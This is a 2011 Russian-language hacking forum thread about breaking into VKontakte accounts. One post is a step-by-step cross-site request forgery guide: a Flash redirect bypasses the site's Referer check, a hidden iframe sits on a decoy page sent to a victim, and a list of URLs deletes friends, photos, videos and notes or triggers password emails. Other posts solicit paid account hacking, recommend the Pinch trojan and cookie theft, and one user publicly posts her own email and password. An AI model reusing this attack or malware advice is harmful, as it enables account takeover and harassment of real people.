RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-15 00:47:56.010000
|
|
|
Shelby91
Сообщений: 84
Оценки: 0
Присоединился: 2010-05-03 13:07:39
|
quote:
ORIGINAL: ilya_stepanov Парни, нужно срочно взломать аккаунт вконтакте. Плачу 1000р. Оплата сразу после предоставления доказательств взлома. Пишите сюда - ilya_stepanov@bk.ru тебе в раздел работа
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-28 10:14:38.343333
|
|
|
Марго61
Сообщений: 1
Оценки: 0
Присоединился: 2011-01-28 10:10:09.200000
|
надо ломануть страницу друга. плачу, но не дорого) жду умельцев в личке!
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-28 10:38:32.113333
|
|
|
Mr. Lima
Сообщений: 29
Оценки: 0
Присоединился: 2011-01-27 19:34:31.300000
|
Боян однако?! Одна уязвимость подробно описана в теме "Техподержки" - или как там это у них называется?.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-31 03:43:28.793333
|
|
|
lott
Сообщений: 4
Оценки: 0
Присоединился: 2008-01-14 12:48:03.350000
|
Прога Multi Password Recovery не работает для паролей в Google Chrome?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-31 11:32:28.110000
|
|
|
lott
Сообщений: 4
Оценки: 0
Присоединился: 2008-01-14 12:48:03.350000
|
Кто подскажет. Заходили с моего компа в Вконтакт и осталась открытая страница аккаунта. Как узнать пароль? Возможно ли узнать мейл?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-31 12:11:39.513333
|
|
|
Groh12
Сообщений: 33
Оценки: 0
Присоединился: 2011-01-22 12:56:09.760000
|
Можно вытащить данные из кукис и будешь заходить на эту страницу без пароля и мейла! А на счет паролей и мейла не в курсе!
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-31 13:38:28.510000
|
|
|
lott
Сообщений: 4
Оценки: 0
Присоединился: 2008-01-14 12:48:03.350000
|
А как вытащить данные из кукис?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-31 16:17:56.133333
|
|
|
varos_pro_T1one
Сообщений: 5
Оценки: 0
Присоединился: 2011-01-31 16:10:03.810000
|
Маленький прикол на всяк сучий 8|8|:):):):) 1. Сайт вконтакте.ру устроен таким образом, что если закрыть страницу сайта, а потом снова ее открыть, страница откроется, не запросив пароль. 2. Сайту, как я понял, все равно каким методом мы посылаем данные из формы - GET или POST - он их обрабатывает одинакого. Мы можем воспользоваться этим. Сформировав определенный URL в адресной строке браузера, мы можем производить некоторые действия. Но, сайт не так просто сделан. 1. В некоторых формах есть скрытые поля с секретным кодом. Не зная этот код, мы ничего не сможем сделать. Но узнать его не просто, поэтому такие формы я не буду затрагивать в статье. 2. Сайт проверяет значение $_SERVER['HTTP_REFERER'], но мы обойдем эту проверку с помощью Flash. Для того, чтобы все отработало успешно, нужно: 1. Чтобы у жертвы в браузере был включен Flash. (У большинства людей, сидящих в этой социальной сети, он включен, т.к. без него не работают многие сервисы контакта: музыка, видео, приложения и т.д.) 2. Чтобы жертва была залогинена вконтакте. (Большинство людей не нажимают кнопку "Выход" вконтакте, даже когда выходят из-за компа, поэтому с этим условием, думаю, проблем тоже не возникнет.) Для примера, попробуйте ввести в адресной строке браузера в новом окне следующий URL: http://vkontakte.ru/groups.php?act=enter&gid=777107 Вы автоматически вступили в группу "В Контакте | Безопасность". Теперь выйдите из группы и попробуйте перейти по точно такой же ссылке: http://vkontakte.ru/groups.php?act=enter&gid=777107 (откроется в новом окне) Теперь вступить в группу вам не удалось, а все по одной причине: переходя по ссылке с любого сайта, в контакт передается значение предыдущей страницы, и, в целях безопасности, он блокирует такие действия. Мы же, чуть позже, обойдем эту защиту. Приведу еще пример - откройте в новом окне следующую страницу: http://vkontakte.ru/settings.php?act=addToBlackList&id=1 Вот и создатель этого сайта оказался у вас в игноре. Подобным образом можно совершать разные действия (их список в конце статьи) Понятно, что если вы кинете жертве подобную ссылку, жертва поймет, в чем подвох. Мы же попытаемся открыть эту страницу незаметно для жертвы. Но, прежде, чем использовать эту уязвимость на жертве, мы потренеруемся на себе. В примере мы создадим скрипт, добавляющий людей в ту же группу -"В Контакте | Безопасность". От вас требуются элементарные знания HTML. Выглядеть будет это так: Мы кидаем жертве ссылку на наш сайт. Жертва открывает эту ссылку. На сайте находится скрытый фрэйм. Этот фрэйм ссылается на специальный Flash-скрипт, который перенаправляет нас на все тот же адрес: http://vkontakte.ru/groups.php?act=enter&gid=777107. Т.к. идет перенаправление через флэш, то адрес предыдущей страницы не передастся, а значит контакт выполнит наше действие. Когда в скрытом фрэйме откроется эта страница, жертва незаметно добавится в группу "В Контакте | Безопасность". Приступим? Практика. Шаг 1. Создаем флэшку. Для начала, создадим эту флэшку. Для ее быстрого создания я написал специальный скрипт: http://swfgen.m0nster.tu2.ru Скрипт запросит у вас URL. Вводите туда http://vkontakte.ru/groups.php?act=enter&gid=777107 и жмите "ОК". Скрипт вернет вам ссылку на готовую флэшку. Качаем флэшку на комп и переименовываем в более читаемый вид. Пусть будет vkontakte.swf Шаг 2. Создаем HTML страничку. Теперь создаем HTML-страничку. Пусть она будет называться просто index.html. Пишем там любую чушь, главное, чтоб не вызвать подозрения у жертвы, что тут что-то неладное. Что написать на странице - дело ваше. После этого вставляем куда-нибудь в тело странички скрытый <IFRAME>. <iframe src="vkontakte.swf" style="width:10px; height:10px; padding:0; margin:0; position:absolute; left:-100; top:-100;"></iframe> (На этом этапе может возникнуть вопрос, почему не сделать просто display:hidden, например. А потому, что в таком случае флэш не отработает) Шаг 3. Теперь у нас есть два файла: vkontakte.swf и index.html Регистрируем какой-нибудь сайт на бесплатном хостинге. Нам даже поддержка PHP не нужна, поэтому почти любой хостинг нам подойдет. Загружаем на свеженький сайт наши файлы. И попробуем открыть страничку index.html. Открывается страничка, ничего странного вроде не наблюдается… Теперь открываем нашу страницу Вконтакте и смотрим список групп - если там появилась группа "В Контакте | Безопасность", значит, все отработало успешно. Можно выйти из этой группы и снова открыть нашу страницу index.html, чтобы точно удостовериться, что все работает. Все, мы научились делать это. Теперь попробуем что-нибудь посложнее. Давайте удалим какую-нибудь фотку у друга. Для этого нужно знать ID фото. Узнать его не сложно: открываем страницу просмотра нужной(а точнее ненужной) фотографии и смотрим адрес страницы. Там что-то типа такого: http://vkontakte.ru/photos.php?act=show&id=1234567_987654321. В этом случае ID фото будет 1234567_987654321. Вы же делаете по аналогии. Когда узнали идентификатор фотографии, идем к уже знакомому скрипту, который сгенерирует нам флэшку. Пишем в поле URL следующий код: http://vkontakte.ru/photos.php?act=do_fdelete&id=ИД_ФОТО Дальше все уже знакомо: переименовываем флэшку, создаем HTML страничку, там <IFRAME>, ссылающийся на нашу флэшку. Теперь кидаем ссылку на нашу страничку другу, и, если друг нажмет на ссылку, то фока у него должна исчезнуть. Думаю, принцип вы поняли. Теперь приведу список возможных действий, и требующийся для них URL. http://vkontakte.ru/settings.php?act=addToBlackList&id=ИД Добавить человека в черный список http://vkontakte.ru/friend.php?act=do_delete&id=ИД Удалить друга http://vkontakte.ru/groups.php?act=enter&gid=ИД_ГРУППЫ Вступить в группу http://vkontakte.ru/groups.php?act=leave&gid=ИД_ГРУППЫ Покинуть группу http://vkontakte.ru/notes.php?act=do_delete&nid=ИД_ЗАМЕТКИ Удалить заметку Редактировать заметку ИД заметки можно узнать из url при просмотре заметки. visible - кто может просматривать заметку. commentable - кто может комментировать могут принимать следующие значения: 0 - все 1 - Друзья и друзья друзей 2 - Только друзья http://vkontakte.ru/video.php?act=do_delete&oid=ИД&id=ИД_ВИДЕО Удалить видео (ИД_ВИДЕО можно узнать из url при просмотре видео) http://vkontakte.ru/photos.php?act=do_fdelete&id=ИД_ФОТО Удалить фото (узнать ид фото можно из url при просмотре фото.) http://vkontakte.ru/settings.php?act=send Выслать на почту жертвы письмо с её паролем
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-31 16:22:08.740000
|
|
|
varos_pro_T1one
Сообщений: 5
Оценки: 0
Присоединился: 2011-01-31 16:10:03.810000
|
quote:
А как вытащить данные из кук Инструменты->Дополнительно->Сookie (v.9.21) А так если куки есть то просто можно попробовать авторизоваться с их помощью Пароль всеравно скорее всего зашифрован
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-01-31 16:25:21.436666
|
|
|
varos_pro_T1one
Сообщений: 5
Оценки: 0
Присоединился: 2011-01-31 16:10:03.810000
|
трояном можно(пинч2альфа подойдет) . или еще какими нибудь подобными прогами.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-01 14:04:48.556666
|
|
|
lott
Сообщений: 4
Оценки: 0
Присоединился: 2008-01-14 12:48:03.350000
|
varos_pro_T1one, спасибо за ответы! Кто скажет, возможно ли смотреть одну и ту же страницу Вконтакте с разных компов. Будет ли она выключаться на на Мамбе у первого после входа второго? или сообщать, что кто-то вошел на сайт и т.п.?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-03 09:59:06.263333
|
|
|
Гугла
Сообщений: 4
Оценки: 0
Присоединился: 2011-02-03 09:56:41.883333
|
реально ломануть контакт без навыков программирования?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-03 12:53:47.326666
|
|
|
yMa.hacKer
Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
|
да
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-03 14:44:38.846666
|
|
|
Гугла
Сообщений: 4
Оценки: 0
Присоединился: 2011-02-03 09:56:41.883333
|
а нет ни у кого ссылочки на видос с подробным описанием как сделать троя для взлома? читаю умные вещи, но без наглядности мозгов не хватает(
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-11 00:26:16.970000
|
|
|
dix2m
Сообщений: 3
Оценки: 0
Присоединился: 2011-02-10 14:58:04.583333
|
Гугла, http://forum.xakep.ru/m_1224792/mpage_1/tm.htm Очень хорошие уроки
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-13 21:57:39.600000
|
|
|
inkognitko
Сообщений: 151
Оценки: 0
Присоединился: 2009-09-13 20:38:47.516666
|
посоветуйте нормальный троян за сколько можно купить и у кого заказать?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-14 17:37:40.076666
|
|
|
Scorpik
Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
|
Привет всем, сегодня зашел в контакт и решил зарегистрировать себе новую страницу, но не тут то было…. Теперь ввели quote:
Регистрация ВКонтакте бесплатна, но осуществляется по приглашениям. Если Вас пригласил один из Ваших друзей, введите код, который Вы получили как с ним бороться и вообще генератора этих приглашений нет еще?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-15 19:40:17.430000
|
|
|
Rolik944
Сообщений: 5
Оценки: 0
Присоединился: 2011-02-13 10:47:09.226666
|
Нужно взломать страничку вконтакте за взлом могу заплатить если надо пишите в icq 603068669 бываю там от 3 до 7 часов о цене договоримся
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-16 18:41:27.486666
|
|
|
nety
Сообщений: 8
Оценки: 0
Присоединился: 2011-02-16 18:36:56.213333
|
народ такая ситуация у всех наверно в школе универе есть компы и с них заходят В вконтакте как можно ето использовать чтобы украсть логин и пароль тех кто заходил с етих компов? и тут еще говорят что подстановка куков не работает ето правда?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-16 19:27:14.850000
|
|
|
darksilence
Сообщений: 9
Оценки: 0
Присоединился: 2011-01-17 20:03:20.196666
|
очень просто достать куки, и еще кого интересует на ачате уже повесил топик, для тех кто не много не в курсе, симка+акк+мыло+п/д
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-17 16:22:05.173333
|
|
|
nety
Сообщений: 8
Оценки: 0
Присоединился: 2011-02-16 18:36:56.213333
|
да но достать куки не так просто папка C:\Documents and Settings и там када выбираешь пользователя написано отказано в доступе как то можно в браузере посмотреть куки? браузер IE 7
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-17 22:21:54.086666
|
|
|
Playway
Сообщений: 1
Оценки: 0
Присоединился: 2011-02-17 22:18:20.826666
|
Ребят, помогите, плиз, взломать контакт…Очень нужно..
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-18 06:27:03.406666
|
|
|
Jugger32
Сообщений: 6
Оценки: 0
Присоединился: 2010-12-24 14:55:33.650000
|
quote:
ORIGINAL: Scorpik Привет всем, сегодня зашел в контакт и решил зарегистрировать себе новую страницу, но не тут то было…. Теперь ввели quote:
Регистрация ВКонтакте бесплатна, но осуществляется по приглашениям. Если Вас пригласил один из Ваших друзей, введите код, который Вы получили как с ним бороться и вообще генератора этих приглашений нет еще? Да, тоже интересует, возможно скоро появится такой, а может и нет, везде кидалово, блин.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-18 06:31:50.103333
|
|
|
Jugger32
Сообщений: 6
Оценки: 0
Присоединился: 2010-12-24 14:55:33.650000
|
Но там приглашение теперь, опять же, если страница привязана к телефону! Хитрюги!!!
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-18 10:31:07.476666
|
|
|
adrenalin_64
Сообщений: 1
Оценки: 0
Присоединился: 2011-02-18 10:10:03.640000
|
Люди, помогите пожалуйста разобраться с троянским вирусом PINCH и где можно его скачать нормальный, тут(на этом сайте) я читал как его настроить/ вот ссылка: http://forum.xakep.ru/m_1092227/tm.htm В инструкции где написанно настройка gate.php by genom я либо не тот ПИНЧ скачал, либо нет такого файла. Кто знает помогите пожалуйста. я на этом сайте новичок, могу редко заходить, если есть возможность напишите в ICQ: 9304392.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-20 03:03:07.460000
|
|
|
PALL MALL
Сообщений: 25
Оценки: 0
Присоединился: 2011-02-13 10:01:21.050000
|
контакт-зло
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-21 09:22:41.090000
|
|
|
Arlion777
Сообщений: 1
Оценки: 0
Присоединился: 2011-02-21 09:15:45.003333
|
Помогите пожалуйста! срочно нужно взломать контакт, за деньги! ася-499366529
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-28 14:23:33.406666
|
|
|
andrey8
Сообщений: 5
Оценки: 0
Присоединился: 2011-01-31 19:37:57.523333
|
Тебе в раздел "Работа"
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-02-28 15:45:49.986666
|
|
|
Azer333
Сообщений: 76
Оценки: 0
Присоединился: 2011-02-26 16:58:53.856666
|
Я как бы судорожно извеняюсь за такой не стандартный вопрос. Но, почему сейчас идет такая пропаганда против вконтакте, почему например не ищут дырки в одноклассниках, не сказал бы, что там меньше народу сидит?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-03-01 10:06:00.570000
|
|
|
Potor
Сообщений: 2
Оценки: 0
Присоединился: 2010-12-10 11:45:39.560000
|
Есть старая методика по взлому вконтакта: каждый китаец по очереди подходит и вводит один пароль. Каждый второй китаец вводит пароль maodzedun. И где-то на 500000-й попытке сервер вконтакте согласится, что у него пароль maodzedun.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-03-01 10:25:00.036666
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
quote:
ORIGINAL: Potor Есть старая методика по взлому вконтакта: каждый китаец по очереди подходит и вводит один пароль. Каждый второй китаец вводит пароль maodzedun. И где-то на 500000-й попытке сервер вконтакте согласится, что у него пароль maodzedun. Я боюсь спрашивать как-же они ддос устраивают…
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-03-01 12:52:17.010000
|
|
|
Surion
Сообщений: 2
Оценки: 0
Присоединился: 2011-03-01 09:54:16.306666
|
Видел видео как узнавали пароль в маил.ру (естественно потом идет контакт)) отправляют скрипт или файл по почте, тот скачивает или заходит на сайт и после на вашу почту присылают пасс, объясните как это сделать?)
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-03-18 13:32:27.433333
|
|
|
B0ndyara
Сообщений: 198
Оценки: 0
Присоединился: 2009-08-22 20:54:55.830000
|
тут много пишут про отправку пароля по почте. Уже давно пасс не отправляют. Скорее всего они его вообще не запоминают, а записывают в базу хэш, скорее всеого с солью. Чтобы сменить нужно подтвердить свое отношение к странице через номер телефона. Да и давно пора, если пасс сменят юзер узнает об этом сразу. Не получится следить за перепиской юзера незаметно. Сегодня меня блокирнули за спам, сцуки. А меня симка уже давно мертвая…. Теперь им фотографии отсылать… Вообще обнаглели. То ли было раньше….
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-03-18 14:37:48.223333
|
|
|
Xo6ot
Сообщений: 19
Оценки: 0
Присоединился: 2011-01-22 12:51:50.513333
|
Раньше такая фишка была, что можно было себе левый год рождения\сп поставить через исходный код, щас такое есть? через старые способы не канает
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-03-24 12:29:50.690000
|
|
|
earthquake
Сообщений: 2
Оценки: 0
Присоединился: 2011-03-24 12:19:49.286666
|
Подскажите пожалуйста, можно ли узнать адрес почты, на которой регестрировался вконтакте человек? телефон он оставил, когда из дома уходил, вот узнать бы логин чтоб восстановить пароль… Ну и если можно, то как?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-03-25 13:00:05.006666
|
|
|
coolboy1991
Сообщений: 9
Оценки: 0
Присоединился: 2011-03-25 11:53:34.596666
|
Как взломать страничку вконтакте?
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-03-31 09:05:23.473333
|
|
|
Devilan
Сообщений: 23
Оценки: 0
Присоединился: 2011-03-15 02:29:41.800000
|
Надыбал я в этом сервере одну крайне любопытную уязвимость. Хочеться ее поднять, да вот ток ума не хватает. Если кто в FTP серверах разбирается давайте в асе на эту тему и поговорим. Оно того стоит, как мне кажется:D.
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-04-01 02:41:45.196666
|
|
|
yuljaserga
Сообщений: 1
Оценки: 0
Присоединился: 2011-04-01 02:26:02.253333
|
ребята.Помогите кто может.Как по моей странице в контакте человек может узнать с какого города я пишу и т.д.Короче говоря можно ли как то сделать чтобы не вычислили ip и мое место нахождения или вообще как-то удалить страницу.Просто я скрываюсь от бывшего мужа деспота а он сказал что как-то меня может вычислить по моей странице!!!Если можно это как-то предотвратить помогите ради Бога!!!!вот адрес и пароль в конт. juliaserga@mail.ru пароль 17aSU23Fyh05
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-04-01 18:22:56.596666
|
|
|
MasterOn
Сообщений: 129
Оценки: 0
Присоединился: 2011-03-21 18:02:02.993333
|
заметил сайт стал совсем глючить вечные перезагрузки происходят всё ведёт к его закрытию:)
|
|
|
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 2011-04-02 15:18:49.990000
|
|
|
lakontara
Сообщений: 1
Оценки: 0
Присоединился: 2011-04-02 13:54:44.640000
|
Всем привет! Подскажите, реально ли узнать оригинальный пароль от контакта, имея доступ к почтовому ящику??
|
|
|
|
|